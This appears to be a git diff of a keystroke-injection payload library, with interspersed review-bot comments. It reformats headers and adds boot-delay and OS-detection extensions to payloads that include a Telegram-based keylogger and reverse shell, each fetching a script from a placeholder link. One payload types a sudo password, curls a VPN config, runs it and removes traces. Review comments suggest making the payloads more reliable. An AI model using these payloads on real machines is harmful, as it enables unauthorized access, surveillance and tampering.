+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
GUI r
DELAY 1000
STRINGLN notepad.exe
diff --git a/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt b/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt
index 1ed9ed86d..12813ca31 100644
--- a/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt
+++ b/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt
@@ -1,12 +1,14 @@
-REM ##################################################################
-REM # |
-REM # Title : Make Windows performant (but ugly and boring) |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ##################################################################
+REM_BLOCK
+##################################################################
+# #
+# Title : Make Windows performant (but ugly and boring) #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+##################################################################
+END_REM
REM Plug-And-Play <3
@@ -16,7 +18,48 @@ REM - Nothing
REM Note:
REM - Payload tested on Windows 11 Eng
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
GUI r
DELAY 2000
diff --git a/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt b/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt
index 50149ba2d..8c6bccdf9 100644
--- a/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt
+++ b/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt
@@ -1,12 +1,14 @@
-REM ########################################################
-REM # #
-REM # Title : Persistent Keylogger - Telegram Based #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Execution #
-REM # Target : Linux #
-REM # #
-REM ########################################################
+REM_BLOCK
+########################################################
+# #
+# Title : Persistent Keylogger - Telegram Based #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Internet Connection
@@ -14,7 +16,33 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
CTRL-ALT t
DELAY 2000
diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
index 1ce309688..36ef49466 100644
--- a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
+++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
@@ -1,12 +1,14 @@
-REM ############################################################
-REM # #
-REM # Title : Persistent Reverse Shell - Telegram Based #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Execution #
-REM # Target : Linux #
-REM # #
-REM ############################################################
+REM_BLOCK
+############################################################
+# #
+# Title : Persistent Reverse Shell - Telegram Based #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+############################################################
+END_REM
REM Requirements:
REM - Internet Connection
@@ -14,7 +16,33 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
CTRL-ALT t
DELAY 2000
diff --git a/payloads/library/execution/SendEmailThroughThunderbird/payload.txt b/payloads/library/execution/SendEmailThroughThunderbird/payload.txt
index c2dd218f1..457de69e7 100644
--- a/payloads/library/execution/SendEmailThroughThunderbird/payload.txt
+++ b/payloads/library/execution/SendEmailThroughThunderbird/payload.txt
@@ -1,13 +1,14 @@
-REM ########################################################
-REM # |
-REM # Title : Send Email Through Thunderbird |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 - Linux(debian tested) |
-REM # |
-REM ########################################################
-
+REM_BLOCK
+########################################################
+# #
+# Title : Send Email Through Thunderbird #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 - Linux(debian tested) #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Internet Connection
diff --git a/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt b/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt
index 0e82f52f2..831f1d0c3 100644
--- a/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt
+++ b/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt
@@ -1,22 +1,64 @@
-REM ############################################################
-REM # |
-REM # Title : Send Messages In Discord Channel-Server |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM ############################################################
-
+REM_BLOCK
+############################################################
+# #
+# Title : Send Messages In Discord Channel-Server #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+############################################################
+END_REM
REM Requirements:
REM - Internet connection
REM - Discord Installed
-
REM If, for example, the server is Hak5 and the channel in which you want to send the message is called usb-rubber-ducky then you should write just usb-rubber-ducky
DEFINE #CHAT_NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Discord app
GUI
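Review bot: `$_OS` is assigned by the PASSIVE_WINDOWS_DETECT block but nothing in this hunk reads it, so the `GUI` keystroke after `END_EXTENSION` is sent whatever the host turned out to be, although the banner lists Windows 10-11 as the only target. If the extension is meant only as a boot delay, say so with a line such as `REM PASSIVE_WINDOWS_DETECT is used here as a boot delay only; $_OS is not checked`; otherwise wrap the body in the `IF ($_OS == WINDOWS) THEN` … `END_IF` form shown in the extension's own usage example, so nothing is typed on a host outside the stated target. The payload body continues outside the hunk, so a later check may exist. The same applies to the other hunks that add this extension (Set_An_Arbitrary_DNS-IPv4_version, Starting_a_PowerShell_with_administrator_permissions_in_Windows, Stop_A_Single_Process_In_Windows, UninstallSignal, Uninstall_A_Specific_App_On_Windows_Through_Control_Panel, Exfiltrate Computer Screenshots).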
diff --git a/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt b/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt
index 1cd871801..f29cf0853 100644
--- a/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt
+++ b/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt
@@ -1,13 +1,14 @@
-
-REM ####################################
-REM # |
-REM # Title : Set Arbitrary VPN |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM ####################################
+REM_BLOCK
+####################################
+# #
+# Title : Set Arbitrary VPN #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+####################################
+END_REM
REM Requirements:
REM - Permissions
@@ -15,44 +16,57 @@ REM - Internet Connection
REM - 'openvpn' installed
REM REQUIRED: You need to know the sudo password and replace 'example' with this
-DEFINE SUDO_PASS example
+DEFINE #SUDO_PASS example
REM REQUIRED: Set your VPN file configuration replacing example.com with your own link
-DEFINE VPN_FILE_LINK example.com
+DEFINE #VPN_FILE_LINK example.com
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-DELAY 1000
CTRL-ALT t
DELAY 2000
-
REM #### PERMISSIONS SECTION ####
-
-
-STRING sudo su
-ENTER
+STRINGLN sudo su
DELAY 1000
-STRING SUDO_PASS
-ENTER
+STRINGLN #SUDO_PASS
DELAY 1000
-
REM #### VPN SECTION ####
-
-
-STRING curl
-STRING VPN_FILE_LINK
-STRING > vpn_configuration.ovpn
-ENTER
+STRINGLN curl #VPN_FILE_LINK > vpn_configuration.ovpn
REM It depends by the internet connection
DELAY 2000
-STRING openvpn vpn_configuration.ovpn
+STRINGLN openvpn vpn_configuration.ovpn
REM It depends by the computer power
DELAY 2000
-
REM #### REMOVE TRACES ####
-
-
STRING rm vpn_configuration.ovpn
ENTER
DELAY 500
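Review bot: The last command of this hunk is still written as `STRING rm vpn_configuration.ovpn` followed by a separate `ENTER`, while every other command in the payload was converted to `STRINGLN` by this change. For consistency write it as `STRINGLN rm vpn_configuration.ovpn`; what is typed stays the same.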
diff --git a/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt b/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt
index 1c690de91..3ac350796 100644
--- a/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt
+++ b/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt
@@ -1,12 +1,12 @@
REM_BLOCK
################################################################
-# |
-# Title : Set An Arbitrary And Persistent Tor Circuit |
-# Author : Aleff |
-# Version : 1.0 |
-# Category : Execution |
-# Target : Windows 10/11; Linux; |
-# |
+# #
+# Title : Set An Arbitrary And Persistent Tor Circuit #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11; Linux; #
+# #
################################################################
Requirements:
diff --git a/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt b/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt
index 2c29325b2..db55616a7 100644
--- a/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt
+++ b/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt
@@ -1,24 +1,65 @@
-REM ########################################################
-REM # |
-REM # Title : Set An Arbitrary DNS (IPv4 version) |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 11 |
-REM # |
-REM ########################################################
-
+REM_BLOCK
+########################################################
+# #
+# Title : Set An Arbitrary DNS (IPv4 version) #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 11 #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Nothing
-
REM DNS IPv4 like Cloudflare DNS 1.1.1.1
DEFINE DNS example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Settings
-DELAY 1000
GUI
DELAY 1000
STRING settings
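Review bot: `DEFINE DNS example` keeps a bare constant name, while the DEFINEs this commit touches elsewhere are given a `#` prefix (`#SUDO_PASS`, `#VPN_FILE_LINK`, `#TOKEN`). As far as I know DEFINE is plain text substitution, so an unprefixed name as short as `DNS` can also be replaced where it appears as an ordinary word in a later command; `DEFINE #DNS example` with a matching `#DNS` at the point of use avoids that. The use site is outside this hunk. The same applies to `DEFINE PROCESS_NAME example` / `STRINGLN PROCESS_NAME` in Stop_A_Single_Process_In_Windows and to `DEFINE SCRIPT-PY-LINK example.com` in Exfiltrate Computer Screenshots.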
diff --git a/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt b/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt
index fca79218b..5718b92e5 100644
--- a/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt
+++ b/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt
@@ -1,12 +1,14 @@
-REM ###################################
-REM # |
-REM # Title : Set Tor Bridge |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ###################################
+REM_BLOCK
+###################################
+# #
+# Title : Set Tor Bridge #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+###################################
+END_REM
REM Requirements:
REM - Tor installed
diff --git a/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt b/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt
index 9935c8935..bba88653e 100644
--- a/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt
+++ b/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt
@@ -1,17 +1,61 @@
-REM ####################################################################################
-REM # |
-REM # Title : Starting a PowerShell with administrator permissions in Windows |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM ####################################################################################
+REM_BLOCK
+####################################################################################
+# #
+# Title : Starting a PowerShell with administrator permissions in Windows #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+####################################################################################
+END_REM
REM Requirements:
REM - Nothing
-DELAY 1000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI x
DELAY 500
STRING a
diff --git a/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt b/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt
index dbdc29d06..178f3b1e5 100644
--- a/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt
+++ b/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt
@@ -1,28 +1,68 @@
-
-REM #####################################################
-REM # |
-REM # Title : Stop A Single Process In Windows |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM #####################################################
-
+REM_BLOCK
+#####################################################
+# #
+# Title : Stop A Single Process In Windows #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+#####################################################
+END_REM
REM Requirements:
REM - Nothing
-
REM Write the name of the process that you want to stop
DEFINE PROCESS_NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Task Manager
GUI
DELAY 1000
-STRING Task Manager
-ENTER
+STRINGLN Task Manager
DELAY 1000
REM Goto search bar
@@ -36,9 +76,7 @@ TAB
DELAY 500
REM Write the process name
-STRING PROCESS_NAME
-DELAY 500
-ENTER
+STRINGLN PROCESS_NAME
DELAY 500
TAB
DELAY 500
diff --git a/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt b/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt
index 0d4958d2a..b3738e80d 100644
--- a/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt
+++ b/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt
@@ -1,12 +1,14 @@
-REM #######################################################
-REM # |
-REM # Title : Telegram Persistent Connection Linux |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM #######################################################
+REM_BLOCK
+#######################################################
+# #
+# Title : Telegram Persistent Connection Linux #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+#######################################################
+END_REM
REM Requirements:
REM - Internet Connection
@@ -14,7 +16,34 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
diff --git a/payloads/library/execution/UninstallSignal/payload.txt b/payloads/library/execution/UninstallSignal/payload.txt
index 9006fbaec..9beced90c 100644
--- a/payloads/library/execution/UninstallSignal/payload.txt
+++ b/payloads/library/execution/UninstallSignal/payload.txt
@@ -1,12 +1,14 @@
-REM #####################################
-REM # |
-REM # Title : Uninstall Signal |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM #####################################
+REM_BLOCK
+#####################################
+# #
+# Title : Uninstall Signal #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+#####################################
+END_REM
REM Plug-And-Play <3
@@ -14,11 +16,52 @@ REM Requirements:
REM - Signal App installed
REM - ExecutionPolicy Bypass
-DELAY 2000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI r
DELAY 1000
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
STRINGLN Stop-Process -Name "Signal"
diff --git a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md
index 826bc0c7d..60bb2ac12 100644
--- a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md
+++ b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md
@@ -36,17 +36,11 @@ In addition to legal implications, **unauthorized removal of an application can
Github
-
-
-
-
- Instagram
- |
- Discord
+ Linkedin
|
diff --git a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt
index 67f6dbd4e..07366cfd9 100644
--- a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt
+++ b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt
@@ -1,12 +1,14 @@
-REM ##############################################################################
-REM # |
-REM # Title : Uninstall A Specific App On Windows Through Control Panel |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ##############################################################################
+REM_BLOCK
+##############################################################################
+# #
+# Title : Uninstall A Specific App On Windows Through Control Panel #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+##############################################################################
+END_REM
REM Requirements:
REM - The application you want to uninstall must be installed on the target (?obvious right? ^^)
@@ -17,15 +19,55 @@ REM - Payload tested on Windows 11 Eng
REM Set the exact name of the application as it appears within the control panel. Do not assume that just because an application is known by a certain name then it will have exactly that name, e.g. `Firefox` shows up again as `Mozilla Firefox (x64 en)`
DEFINE #APP_NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
